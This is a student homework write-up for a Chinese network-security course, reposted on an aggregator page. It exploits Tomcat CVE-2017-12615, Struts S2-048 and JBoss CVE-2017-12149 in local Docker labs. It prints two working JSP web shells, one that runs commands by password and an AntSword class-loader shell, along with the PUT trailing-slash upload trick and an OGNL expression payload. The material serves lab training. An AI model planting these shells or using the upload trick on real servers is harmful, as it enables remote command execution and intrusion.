马哥教育C10网络安全课第四周作业2024_0831

news/2024/12/31 1:02:28/文章来源:https://www.cnblogs.com/vionysos/p/18402865

网络安全C10-2024.8.31
作业:
1、安装burp并实现抓取HTTP站点的数据包(HTTPS站点暂时不要求)
(1)安装Java 1.8.144; 设定操作系统环境变量
- JAVA_HOME jdk文件夹的绝对路径 例:
JAVA_HOME=C:\Program Files\Java\jdk1.8.0_144
- CLASSPATH
CLASSJPATH=.;%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tools.jar;
- PATH
PATH=%JAVA_HOME%\bin
(2)安装并设定Burp
(3)设定浏览器代理伺服器:127.0.0.1 端口:8080
(4)启动Burp,在Proxy页面intercept设成off,在浏览器键入欲访问的网站地址
在Burp的Proxy页面点击intercept is on,刷新浏览器,便可抓取http站点的数据包,如下图所示
img
2、练习Tomcat PUT方法任意写文件漏洞(CVE-2017-12615),提供蚁剑连接成功截图
img

步骤如下:

(1)Rocky 9.3无法成功启动CVE-2017-12615容器,重新安装Centos7 虚拟机。
(2) 拉取镜像
docker pull cved/cve-2017-12615
(3)背景执行容器,并指定端口8080
docker run -d -p 8080:8080 cved/cve-2017-12615
(4)浏览器打开确认tomcat运行成功
img
(5)利用cve-2017-12615漏洞,改造用put /1.jsp/ 上传文件到tomcat
要注意1.jsp/ 1.jsp后面要加上/, 让tomcat以为档名后缀不是jsp,因为tomcat会阳档不让jsp档上传
但操作系统会把自动把1.jsp/档名后缀的/过自动去除。
1.jsp

<%if("magedu".equals(request.getParameter("pwd"))){java.io.InputStream in =
Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>

img

(6)将蚁剑脚本yijian.jsp同上方法上传至tomcat伺服器
yijian.jsp

<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode",String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>

img

(7)安装蚁剑 https://github.com/AntSwordProject/antSword
初始化蚁剑,执行蚁剑,输入tomcat容器网址端口及蚁剑脚本,输入连接密码,测试连接
img
(8)如连接成功,可添加后得到,tomcat的目录,如下图
img

3、练习S2-048 远程代码执行漏洞(CVE-2017-9791),提供命令执行截图

(1) 拉取镜像
docker pull docker.io/piesecurity/apache-struts2-cve-2017-5638
(2)执行容器
docker run -d -p 8081:8080 piesecurity/apache-struts2-cve-2017-5638
(3)浏览器访问struss
http://192.168.253.133:8081/showcase.action
img

(4)在Gangster Name写一个表达式 ${},例如填上${5*8},其它栏位任意值后送出

img
(5)返回表达式的计算结果
得到 40
img
4、练习JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149),提供命令执行截图

(1)拉取镜像
docker pull docker.io/hackingpub/cve-2017-12149
(2)执行容器
docker run -d -p 8082:8080 hackingpub/cve-2017-12149
(3)浏览器访问
需要等一下才能存取
192.168.253.133:8082
img
(4) 使用工具
执行jboss反序列化_CVE-2017-12149.jar
填上JBOSS容器的地址和端口,cmd填入欲执行的命令例如whoami,按下执行
得到结果root
img

5、以任一合法网站为目标进行信息收集练习并形成报告,要求使用fcsan、Goby、dirsearch,禁止进行违规操作
因dirsearch未设定完成,先以fscan、御剑和Goby的结果收集本地的虚拟机为例。
(1) fscan64 -h 192.168.253.133

(2) 御剑

(3) Goby










本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/794068.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

十年来(2015-2024)植物/农学领域有哪些学者戴上了杰青帽子?

2024年杰青建****议资助项目申请人名单(部分名单)(注:该表只是统计现公布的名单,欢迎留言补充) 2023年杰青建议资助项目申请人名单2022年杰青建议资助项目申请人名单2020年杰青建议资助项目申请人名单2019杰青建议资助项目申请人名单2018杰青建议资助项目申请人名单2017杰…

Nature Comm. | CoPheScan:一种考虑连锁不平衡的全表型组关联分析

分享一篇最近发表在NC的一篇文章:CoPheScan: phenome-wide association studies accounting for linkage disequilibrium。文章介绍了一种新的贝叶斯方法CoPheScan(Coloc adapted Phenome-wide Scan),用于在考虑连锁不平衡(LD)的情况下进行表型范围关联研究(Phenome-wid…

智能农业和精准农业中的计算机视觉:技术与应用

计算机视觉智能系统融合了计算机视觉、人工智能和机器学习技术,使机器能够模仿人类的视觉和认知能力做出决策,已广泛融入现代人类生活的各个层面。自 20 世纪后期以来,自动化的视觉系统已革新了各多个行业。鉴于世界人口的增长、可耕地的减少以及劳动力的短缺等问题,农业从…

Plant Com | 上海师范大学生科院解析杂草稻近代野化的进化机制

2024年8月19日,上海师范大学生命科学学院的研究团队在_Plant Communications在线发表了题为“Landrace introgression contributed to the recent feralization of weedy rice in East China”的论文。研究揭示了我国江浙沪地区稻田中的杂草稻都为近代野化起源,并均衍生于籼型…

PBJ | 钱前院士综述:野生稻——开启水稻育种的未来

PBJ近日在线发表了中国农业科学院和崖州湾国家实验室合作的题为“Wild rice: unlocking the future of rice breeding”的综述论文,文章系统梳理了稻属各物种间的系统进化关系、分类及地理分布,栽培稻育种中已鉴定的野生稻来源基因,分析了野生稻耐生物胁迫、非生物胁迫基因的…

图解:14个国家超级计算中心

相信大家都听过计算机、数据中心,超级计算机,但是超级计算中心是什么呢?听起来不明觉厉,但其实超级计算中心就是将多个超级计算机放在一个数据中心内。国家超级计算中心是由国家科技部批准成立的数据计算机构,是科技部下属事业单位。那么超级计算中心有什么作用呢?当然是…

综述 | 杂种优势形成机制和预测方法及其在猪生产中的应用与展望

杂种优势是指不同品种或品系间的杂交代在生长、发育、繁殖和抗病抗逆等性状优于亲代的现象。杂交能有效提高后代的生长发育性能、繁殖性能和抗病性,因此被广泛应用于农业生产。然而,现有杂种优势理论只能解释部分杂种优势现象;并且由于杂种优势理论不完善,现有的杂种优势预…

全球7大家禽育种公司的前世今生

我国白羽肉鸡的祖代全部是从国外引进的品种,属于快大型肉鸡,其生长速度快、产肉量多,适合工业化生产,作为肉鸡屠宰加工企业的主要原料,白羽肉鸡是我国肉鸡产品主导品种,目前我国白羽肉鸡主要包括艾拔益加(AA+)、罗斯(Ross)308、科宝(Cobb)、海波罗(Hybro)和哈伯德…

中国农作物分布地图(2015-2021年)

中国是世界人口最多的国家,在全球谷物生产方面排名第一。通过多样化作物种类的多熟制种植,可以显著增加农作物产量,并减少相关的环境影响。全球约12%的农田实行多熟制,其中34%的水稻地采用多熟制系统。中国用仅占全球7%的耕地养活了世界20%的人口。中国约三分之一的农田种植…

华为智慧农业解决方案

物联网有望成为促进农业提产、实现供需平衡的关键使能技术。智慧农业采用了基于物联网的先进技术和解决方案,通过实时收集并分析现场数据及部署指挥机制的方式,达到提升运营效率、扩大收益、降低损耗的目的。可变速率、精准农业、智能灌溉、智能温室等多种基于物联网的应用将…

Nature Genetics | Rajeev K. Varshney综述:解锁植物遗传学的端粒到端粒(T2T)基因组组装

近期,Rajeev K. Varshney团队在Nature genetics发表综述文章:Unlocking plant genetics with telomere-to-telomere genome assemblies。摘要 连续基因组序列组装将帮助我们实现作物转化基因组学的全面潜力。最近在测序技术方面的进步,尤其是长读长测序策略,使得构建无间隙…